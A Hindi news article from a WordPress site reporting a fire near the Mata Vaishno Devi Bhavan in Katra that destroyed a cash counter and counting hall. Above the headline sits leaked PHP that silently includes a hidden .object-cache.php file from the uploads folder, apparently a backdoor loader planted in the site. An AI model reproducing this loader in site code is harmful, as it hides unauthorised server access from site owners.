add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जम्मू: Mata Vaishno Devi Bhavan के पास लगी आग, कैश काउंटर जलकर खाक – SOCH INDIA
Menu

देश
जम्मू: Mata Vaishno Devi Bhavan के पास लगी आग, कैश काउंटर जलकर खाक

nobanner

कटड़ा स्थित माता वैष्णो देवी के दरबार (Mata Vaishno Devi Bhavan) के नजदीक आग लग गई. कालिका भवन के पास काउंटर नंबर दो के नजदीक आग की लपटें उठने से हड़कंप मच गया. आग पर काबू पाने के लिए बड़े पैमाने पर बचाव कार्य चलाया गया. आग में कैश काउंटर जलकर खाक हो गया, आग पर काबू पा लिया गया है.

कालिका भवन में लगी आग
जानकारी के मुताबित इस आग में रूम नंबर 4 और आसपास का परिसर पूरी तरह जलकर खाक हो गया. आग में हालांकि कोई हताहत नहीं हुआ. पुलिस सूत्रों का कहना है कि आग माता वैष्णो देवी मंदिर परिसर स्थित कालिका भवन की इमारत में लगी. अब इस आग पर काबू पा लिया गया है.

शॉर्ट सर्किट हो सकता है कारण
सूत्रों ने कहा, आग का कारण संभवत: शॉर्ट सर्किट हो सकता है. इसी परिसर में स्थित एक एक इमारत में काउंटिंग हॉल है, वह जलकर खाक हो गया है. इस हॉल में भक्तों के चढ़ावे की काउंटिंग होती थी. आग की लपटें भैरों घाटी तक दिखाई दीं. कड़ी मशक्कत के बाद फायर विंग के जवानों ने आग पर काबू पाया. फिलहाल नुकसान के बारे में अभी तक श्राइन बोर्ड की ओर से कोई बयान नहीं आया है.